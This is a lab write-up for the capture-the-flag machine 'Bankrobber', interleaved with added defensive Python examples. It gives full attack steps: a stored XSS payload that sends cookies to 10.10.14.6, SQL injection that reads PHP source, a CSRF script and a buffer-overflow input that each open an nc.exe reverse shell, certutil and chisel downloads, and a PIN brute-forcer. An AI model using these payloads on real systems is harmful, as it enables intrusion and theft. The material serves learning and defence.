Service overview

$ nmapAutomator.sh -H 10.10.10.154 -t Full

PORT     STATE SERVICE      VERSION
80/tcp   open  http         Apache httpd 2.4.39 ((Win64) OpenSSL/1.1.1b PHP/7.3.4)
|_http-server-header: Apache/2.4.39 (Win64) OpenSSL/1.1.1b PHP/7.3.4
|_http-title: E-coin
443/tcp  open  ssl/http     Apache httpd 2.4.39 ((Win64) OpenSSL/1.1.1b PHP/7.3.4)
|_http-server-header: Apache/2.4.39 (Win64) OpenSSL/1.1.1b PHP/7.3.4
|_http-title: E-coin
| ssl-cert: Subject: commonName=localhost
| Not valid before: 2009-11-10T23:48:47
|_Not valid after:  2019-11-08T23:48:47
|_ssl-date: TLS randomness does not represent time
| tls-alpn:
|_  http/1.1
445/tcp  open  microsoft-ds Microsoft Windows 7 - 10 microsoft-ds (workgroup: WORKGROUP)
3306/tcp open  mysql        MariaDB (unauthorized)
Service Info: Host: BANKROBBER; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: 4m06s, deviation: 0s, median: 4m06s
| smb-security-mode:
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode:
|   2.02:
|_    Message signing enabled but not required
| smb2-time:
|   date: 2021-06-04T11:00:22
|_  start_date: 2021-06-04T10:55:07

Web

http://10.10.10.154

  • create the user 123user:123user123
  • id, username and password are stored as cookies

Send coins to someone => admin reviews the transaction.

Put an XSS payload in the comment:

javascript:document.write('<script>img = new Image(); img.src = "http://10.10.14.6/img.gif?"+document.cookie;</script>')

Start a server with python3 -m http.server 80 =>

"GET /img.gif?username=YWRtaW4%3D;%20password=SG9wZWxlc3Nyb21hbnRpYw%3D%3D;%20id=1 HTTP/1.1" 404 -

=> the cookie values decode from base64 to admin:Hopelessromantic => log in as admin.
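The comment field is stored and later rendered unescaped in the admin's view, which is what turns a transfer note into stored XSS. As an added example (not code from the writeup or the box), here is what the receiving side should do with such a comment: encode it on output, and flag the two payload shapes shown above for review. The sample comments are constructed; the detector pattern is a heuristic, not an exhaustive XSS filter.

```python
import html
import re

# Constructed sample comments: the two payload shapes from the writeup
# (a javascript: URI that writes a <script> tag, and a remote <script src>)
# plus a benign one, so the checks below have input to run on.
SAMPLE_COMMENTS = [
    "thanks for the coffee",
    "javascript:document.write('<script>img = new Image(); "
    "img.src = \"http://10.10.14.6/img.gif?\"+document.cookie;</script>')",
    '<script src="http://10.10.14.6/script.js"></script>',
]

# Shapes that should never appear in a free-text transfer comment.
_SUSPICIOUS = re.compile(
    r"<\s*script\b"        # inline or remote script tag
    r"|javascript\s*:"     # javascript: URI
    r"|\bon[a-z]+\s*=",    # inline event handler such as onerror=
    re.IGNORECASE,
)


def looks_like_xss(comment: str) -> bool:
    """Triage heuristic: flag script tags, javascript: URIs and event handlers."""
    return _SUSPICIOUS.search(comment) is not None


def render_comment(comment: str) -> str:
    """Output encoding, the fix that actually matters: whatever was stored,
    the browser receives inert text, so <script> never becomes a tag in the
    admin's page."""
    return html.escape(comment, quote=True)


def review_queue(comments):
    """(rendered_html, flagged) for each comment, as a moderation view would show it."""
    return [(render_comment(c), looks_like_xss(c)) for c in comments]


if __name__ == "__main__":
    for rendered, flagged in review_queue(SAMPLE_COMMENTS):
        print("FLAGGED" if flagged else "ok     ", rendered)
```

Output encoding is the fix; the detector is only a triage aid. The second half of the problem is that the stolen cookie is worth anything: the application keeps the password, base64-encoded, in a cookie that is readable from script, so any injected code can read it with document.cookie. Keeping credentials out of cookies and marking the session cookie HttpOnly limits what an XSS can exfiltrate.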

Xampp

https://10.10.10.154/notes.txt => default xampp folder (C:\xampp)

SQL Injection

Try this in the user search:

1 and 1=1

Use Burp Repeater to find the number of columns:

term=1'+order+by+3--+- - ok
term=1'+order+by+4--+- - not ok

=> 3 columns

term=1'+union+select+user(),2,3--+-

root@localhost

term=1'+union+select+database(),2,3--+-

bankrobber
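To show why the ORDER BY and UNION probes above work and what closes them, here is an added example (not code from the writeup or the box) using an in-memory SQLite table as a constructed stand-in for the bankrobber database. It uses sqlite_version() where the writeup uses MariaDB's user(), because SQLite has no such function; the vulnerable query shape and the parameterised fix are the same on either engine.

```python
import sqlite3


def make_db() -> sqlite3.Connection:
    """Constructed stand-in for the users table (in-memory SQLite, fake rows)."""
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE users (id INTEGER, username TEXT, password TEXT)")
    con.executemany("INSERT INTO users VALUES (?, ?, ?)",
                    [(1, "admin", "<redacted>"), (3, "123user", "<redacted>")])
    return con


def search_vulnerable(con, term):
    """The pattern behind the writeup's probes: the search term is pasted into the
    SQL text, so a quote closes the literal and the rest is parsed as SQL."""
    sql = f"SELECT id, username, password FROM users WHERE id = '{term}'"
    return con.execute(sql).fetchall()


def search_fixed(con, term):
    """Parameterised query: the driver sends the term as data, never as SQL."""
    return con.execute(
        "SELECT id, username, password FROM users WHERE id = ?", (term,)
    ).fetchall()


def probe_column_count(con, max_cols=8):
    """The ORDER BY probe from the writeup, run against the vulnerable query:
    ORDER BY n errors once n exceeds the number of selected columns.  A reviewer
    can use the same probe to confirm an endpoint is injectable before fixing it."""
    for n in range(1, max_cols + 1):
        try:
            search_vulnerable(con, f"1' order by {n}-- -")
        except sqlite3.OperationalError:
            return n - 1
    return max_cols


if __name__ == "__main__":
    con = make_db()
    print("columns:", probe_column_count(con))
    inj = "1' union select sqlite_version(),2,3-- -"
    print("vulnerable:", search_vulnerable(con, inj))   # two rows, one is the UNION
    print("fixed:     ", search_fixed(con, inj))        # no row has that id
```

Two points from the writeup go beyond the query itself: the application connects as root@localhost, and that account holds FILE privilege, which is what lets load_file() read PHP source off disk. A dedicated database user with only the DML rights the site needs would have stopped the source disclosure even with the injection present.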

term=1'+union+select+load_file("C:/xampp/htdocs/admin/backdoorchecker.php"),2,3--+-

<?php
include('../link.php');
include('auth.php');

$username = base64_decode(urldecode($_COOKIE['username']));
$password = base64_decode(urldecode($_COOKIE['password']));
$bad    = array('$(','&');
$good    = "ls";

if(strtolower(substr(PHP_OS,0,3)) == "win"){
 $good = "dir";
}

if($username == "admin" && $password == "Hopelessromantic"){
 if(isset($_POST['cmd'])){
   // FILTER ESCAPE CHARS
   foreach($bad as $char){
    if(strpos($_POST['cmd'],$char) !== false){
     die("You're not allowed to do that.");
    }
   }
   // CHECK IF THE FIRST 2 CHARS ARE LS
   if(substr($_POST['cmd'], 0,strlen($good)) != $good){
    die("It's only allowed to use the $good command");
   }

   if($_SERVER['REMOTE_ADDR'] == "::1"){
    system($_POST['cmd']);
   } else{
    echo "It's only allowed to access this function from localhost (::1).<br> This is due to the recent hack attempts on our server.";
   }
 }
} else{
 echo "You are not allowed to use this function!";
}
?>

=> the pipe character | is not filtered, and the prefix check only looks at the first three characters.
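The PHP above is a denylist plus a prefix check, and its localhost test is a source-IP check. As an added example (not code from the writeup or the box), the same two checks re-implemented in Python next to the version that would hold: an exact allowlist, a directory listing that never touches a shell, and a CSRF token in place of the REMOTE_ADDR test, since the request in this chain genuinely does arrive from ::1 (the admin's own browser sends it). Command strings in the demo are constructed.

```python
import hmac
import ipaddress
import os
import re

BAD = ("$(", "&")    # the denylist in backdoorchecker.php
GOOD = "dir"         # what the PHP selects on Windows, the host in this writeup


def legacy_filter_allows(cmd: str) -> bool:
    """Re-implementation of the PHP logic: reject if any denylisted token occurs,
    then accept if the first len(GOOD) characters equal GOOD.  Whatever follows
    the prefix, a pipe included, is never examined."""
    if any(token in cmd for token in BAD):
        return False
    return cmd[:len(GOOD)] == GOOD


# A plain file name: starts with an alphanumeric, no separators or metacharacters,
# so ".." and "..\secret" are rejected along with anything the shell would parse.
_ARG = re.compile(r"[A-Za-z0-9_][A-Za-z0-9_.-]*")


def strict_allows(cmd: str) -> bool:
    """Allowlist: exactly the command name, optionally one simple file-name argument."""
    parts = cmd.split()
    if len(parts) == 0 or len(parts) > 2 or parts[0] != GOOD:
        return False
    return len(parts) == 1 or _ARG.fullmatch(parts[1]) is not None


def list_directory(path: str = ".") -> list:
    """What the endpoint actually needs.  No shell is involved, so there is no
    command string for a pipe or anything else to escape into."""
    return sorted(os.listdir(path))


def request_authorized(remote_addr: str, session_token: str, form_token: str) -> bool:
    """Keep the loopback check if you want, but bind the action to a per-session
    CSRF token compared in constant time: script running in the admin's browser
    cannot read that token, so it cannot forge a valid POST."""
    return (ipaddress.ip_address(remote_addr).is_loopback
            and hmac.compare_digest(session_token, form_token))


if __name__ == "__main__":
    for cmd in ("dir", "dir notes.txt", "dir | hostname", "dir & hostname"):
        print(f"{cmd!r:22} legacy={legacy_filter_allows(cmd)!s:5} strict={strict_allows(cmd)}")
```

The same file also compares the cookie password against a plaintext constant, which is why the stolen cookie from the XSS step logs straight in; a server-side session id that carries no credential would have made the exfiltrated cookie far less useful.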

$ nano script.js:

var xhr = new XMLHttpRequest();
var url = "http://localhost/admin/backdoorchecker.php";
var params = "cmd=dir | \\\\10.10.14.6\\share\\nc.exe 10.10.14.6 1234 -e cmd.exe";
xhr.open("POST", url);
xhr.setRequestHeader('Content-Type', 'application/x-www-form-urlencoded');
xhr.withCredentials = true;
xhr.send(params);

Start an SMB server:

smbserver.py -smb2support share $(pwd)
nc -lnvp 1234

Send the transaction via Burp:

POST /user/transfer.php HTTP/1.1
Host: 10.10.10.154
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-type: application/x-www-form-urlencoded
Content-Length: 84
Origin: http://10.10.10.154
Connection: close
Referer: http://10.10.10.154/user/
Cookie: id=3; username=MTIzdXNlcg%3D%3D; password=MTIzdXNlcjEyMw%3D%3D

fromId=3&toId=1&amount=1&comment=<script+src="http://10.10.14.6/script.js"></script>

Start the web server: python3 -m http.server 80.

User flag

C:\Users\Cortin\Desktop>ipconfig
Windows IP Configuration
Ethernet adapter Ethernet0 2:
   Connection-specific DNS Suffix  . :
   IPv6 Address. . . . . . . . . . . : dead:beef::558a:2e46:9d1f:9962
   Temporary IPv6 Address. . . . . . : dead:beef::423:ec2c:39c7:2b02
   Link-local IPv6 Address . . . . . : fe80::558a:2e46:9d1f:9962%2
   IPv4 Address. . . . . . . . . . . : 10.10.10.154
   Subnet Mask . . . . . . . . . . . : 255.255.255.0
   Default Gateway . . . . . . . . . : fe80::250:56ff:feb9:1a7c%2
                                       10.10.10.2
Tunnel adapter isatap.{0637FAE2-5EF8-43F7-ADAC-E58020091A92}:
   Media State . . . . . . . . . . . : Media disconnected
   Connection-specific DNS Suffix  . :
C:\Users\Cortin\Desktop>type user.txt
f635346600876a43441cf1c6e94769ac

Privilege escalation

$ netstat -anop TCP
Active Connections

  Proto  Local Address          Foreign Address        State           PID
  TCP    0.0.0.0:80             0.0.0.0:0              LISTENING       2904
  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING       748
  TCP    0.0.0.0:443            0.0.0.0:0              LISTENING       2904
  TCP    0.0.0.0:445            0.0.0.0:0              LISTENING       4
  TCP    0.0.0.0:910            0.0.0.0:0              LISTENING       1620
  TCP    0.0.0.0:3306           0.0.0.0:0              LISTENING       1828
  TCP    0.0.0.0:49664          0.0.0.0:0              LISTENING       464
  TCP    0.0.0.0:49665          0.0.0.0:0              LISTENING       920
  TCP    0.0.0.0:49666          0.0.0.0:0              LISTENING       892
  TCP    0.0.0.0:49667          0.0.0.0:0              LISTENING       1416
  TCP    0.0.0.0:49668          0.0.0.0:0              LISTENING       592
  TCP    0.0.0.0:49669          0.0.0.0:0              LISTENING       600
  TCP    10.10.10.154:139       0.0.0.0:0              LISTENING       4
  TCP    10.10.10.154:49848     10.10.14.6:445         ESTABLISHED     4
  TCP    10.10.10.154:49850     10.10.14.6:1234        ESTABLISHED     4160
  TCP    127.0.0.1:3306         127.0.0.1:49846        ESTABLISHED     1828
  TCP    127.0.0.1:3306         127.0.0.1:49847        ESTABLISHED     1828
  TCP    127.0.0.1:49846        127.0.0.1:3306         ESTABLISHED     3156
  TCP    127.0.0.1:49847        127.0.0.1:3306         ESTABLISHED     3156
  TCP    127.0.0.1:49854        127.0.0.1:3306         TIME_WAIT       0

=> port 910 stands out: it listens on 0.0.0.0 but was not reachable from outside.

Port Forwarding

Use Chisel:

$ wget https://github.com/jpillora/chisel/releases/download/v1.7.6/chisel_1.7.6_windows_amd64.gz
$ gunzip chisel..
(Windows build for the target, Linux build for the attacking machine:)
https://github.com/jpillora/chisel/releases/download/v1.7.6/chisel_1.7.6_linux_amd64.gz
$ ./chisel server --port 5555 -reverse

And on the target:

certutil -urlcache -f "http://10.10.14.6/chisel_1.7.6_windows_amd64" chisel.exe
chisel client 10.10.14.6:5555 R:910:127.0.0.1:910

On the local machine:

$ nc 127.0.0.1 910
--------------------------------------------------------------
 Internet E-Coin Transfer System
 International Bank of Sun church
                                        v0.1 by Gio & Cneeliz
 --------------------------------------------------------------
 Please enter your super secret 4 digit PIN code to login:
 [$] 1234
 [!] Access denied, disconnecting client....

Write a brute-force script, code.py:

import socket

# Walk the whole 4-digit PIN space (0000..9999): one TCP connection per guess,
# read the banner, send the zero-padded guess, and stop at the first reply
# that does not contain "Access denied".
for i in range(0, 10000):
    code = f"{i:04d}"
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect(("localhost", 910))    # port 910 forwarded through chisel
    data = s.recv(8192)              # banner and PIN prompt, not needed
    s.send(code.encode() + b"\n")
    data = s.recv(8192).decode("utf-8")
    s.close()
    if "Access denied" not in data:
        print(f"valid code: {code}")
        break

$ python code.py
0021
--------------------------------------------------------------  

 Internet E-Coin Transfer System  
 International Bank of Sun church  
                                        v0.1 by Gio & Cneeliz
 --------------------------------------------------------------  

 Please enter your super secret 4 digit PIN code to login:  
 [$] 0021  
 [$] PIN is correct, access granted!
 --------------------------------------------------------------  

 Please enter the amount of e-coins you would like to transfer:  
 [$] 100  
 [$] Transfering $100 using our e-coin transfer application.  
 [$] Executing e-coin transfer tool: C:\Users\admin\Documents\transfer.exe

 [$] Transaction in progress, you can safely disconnect...
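The script walks all 10,000 PINs in one pass because the service accepts unlimited guesses from the same client. As an added example (not part of the writeup or of the box's transfer service), here is a server-side gate with a constant-time compare and a per-client lockout, plus a helper that shows what the lockout does to the worst-case search time. The PIN 0021 is the one recovered above; the client addresses and policy numbers are constructed, and the injectable clock exists so the lockout can be exercised without sleeping.

```python
import hmac
import time

PIN_SPACE = 10 ** 4     # a 4-digit PIN: 0000..9999


class PinGate:
    """Server-side PIN check with a per-client lockout after repeated failures."""

    def __init__(self, pin, max_failures=5, lockout_seconds=300.0, clock=time.monotonic):
        self._pin = pin.encode()
        self.max_failures = max_failures
        self.lockout_seconds = lockout_seconds
        self._clock = clock
        self._state = {}            # client -> (failure_count, locked_until)

    def check(self, client, guess):
        """Return 'granted', 'denied' or 'locked' for one guess from `client`."""
        failures, locked_until = self._state.get(client, (0, 0.0))
        now = self._clock()
        if now < locked_until:
            return "locked"         # the guess is not even evaluated
        # compare_digest keeps the comparison time independent of where the
        # first differing digit sits, so timing gives nothing away.
        if hmac.compare_digest(self._pin, guess.encode()):
            self._state.pop(client, None)
            return "granted"
        failures += 1
        if failures >= self.max_failures:
            self._state[client] = (0, now + self.lockout_seconds)
        else:
            self._state[client] = (failures, 0.0)
        return "denied"


def seconds_to_exhaust(max_failures, lockout_seconds):
    """Worst-case wall-clock time for one client to try every PIN under the
    policy, ignoring network latency.  Without a lockout the cost is latency
    alone, which is why the brute-force script above finishes in seconds."""
    return PIN_SPACE * lockout_seconds / max_failures


if __name__ == "__main__":
    gate = PinGate("0021", max_failures=3, lockout_seconds=60)
    for guess in ("0000", "0001", "0002", "0021"):
        print(guess, gate.check("10.10.14.6", guess))   # denied x3, then locked
    days = seconds_to_exhaust(5, 300) / 86400
    print(f"worst case with 5 tries per 5-minute lockout: {days:.1f} days")
```

A lockout keyed on client address slows a single source down but does not stop guessing spread across many sources; the lasting fix for a 10^4 keyspace is a longer secret or a second factor, with the lockout as defence in depth.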

=> the transfer amount is passed to transfer.exe, so try a buffer overflow => copy nc.exe to C:\users\public\nc.exe

After that:

$ nc -lnvp 1235
$ nc localhost 910
0021
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAC:\Users\Public\nc.exe 10.10.14.6 1235 -e cmd.exe

Root flag

C:\Users\admin\Desktop>ipconfig
Windows IP Configuration
Ethernet adapter Ethernet0 2:

   Connection-specific DNS Suffix  . :
   IPv6 Address. . . . . . . . . . . : dead:beef::558a:2e46:9d1f:9962
   Temporary IPv6 Address. . . . . . : dead:beef::423:ec2c:39c7:2b02
   Link-local IPv6 Address . . . . . : fe80::558a:2e46:9d1f:9962%2
   IPv4 Address. . . . . . . . . . . : 10.10.10.154
   Subnet Mask . . . . . . . . . . . : 255.255.255.0
   Default Gateway . . . . . . . . . : fe80::250:56ff:feb9:1a7c%2
                                       10.10.10.2
Tunnel adapter isatap.{0637FAE2-5EF8-43F7-ADAC-E58020091A92}:
   Media State . . . . . . . . . . . : Media disconnected
   Connection-specific DNS Suffix  . :
C:\Users\admin\Desktop>type root.txt
aa65d8e6216585ea636eb07d4a59b197